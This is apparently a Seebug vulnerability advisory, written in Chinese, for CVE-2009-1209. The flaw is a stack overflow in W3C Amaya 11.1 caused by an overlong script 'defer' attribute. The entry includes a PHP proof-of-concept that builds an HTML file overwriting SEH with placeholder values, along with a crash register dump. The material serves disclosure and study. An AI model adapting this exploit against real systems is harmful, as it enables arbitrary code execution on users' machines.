W3C Amaya HTML script标签栈溢出漏洞

2009-04-0200:00:00

Root

www.seebug.org

0.142 Low

EPSS

Percentile

95.7%

JSON

BUGTRAQ ID: 34295
CVE(CAN) ID: CVE-2009-1209

Amaya是W3C出品的所见即所得的网页编辑/浏览器。

如果用户受骗使用Amaya打开的网页中script标签设置了超长的defer属性的话，则在解析该网页时就可以触发栈溢出，导致执行任意代码。

W3C Amaya 11.1

W3C

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

<a href=“http://www.w3.org/Amaya/” target=“_blank”>http://www.w3.org/Amaya/</a>


                                                &lt;?php

/**//*

     Amaya 11.1 W3C\'s editor/browser
     Stack Owerflow POC
     Discover by Alfons Luja
     Thx : OiN
     select * from friends --
     This stUff overwrite SEH in my box XP home sp 2
     To correctly overwrite seh you must upload \&quot;remote_love.html\&quot; to remote server
     Amaya allow only printable shellcode in this case  
    
     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343
    
      
*//**/

$junk = \&quot;\\x41\&quot;;
$n_seh = \&quot;\\x42\\x42\\x42\\x42\&quot;;  //pointer to next seh
$h_seh = \&quot;\\x43\\x43\\x43\\x43\&quot;;  //seh handler

for($i=1;$i&lt;7000 - (4*19) - 10;$i++){ $junk.=\&quot;\\x41\&quot;; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = \&quot;&lt;script defer=\\\&quot;\&quot;.$junk.\&quot;\\\&quot;&gt;\&quot;;

$hnd = fopen(\&quot;remote_love.html\&quot;,\&quot;w\&quot;);
    
       if($hnd){

          fputs($hnd,$hello);
          fclose($hnd);
          echo\&quot;DONE !!\\n\&quot;;
    
       } else {

          echo\&quot;Kupa !!\\n\&quot;;

       }

?&gt;

http://sebug.net/exploit/6085/

0.142 Low

EPSS

Percentile

95.7%

JSON

Related for SSV:4981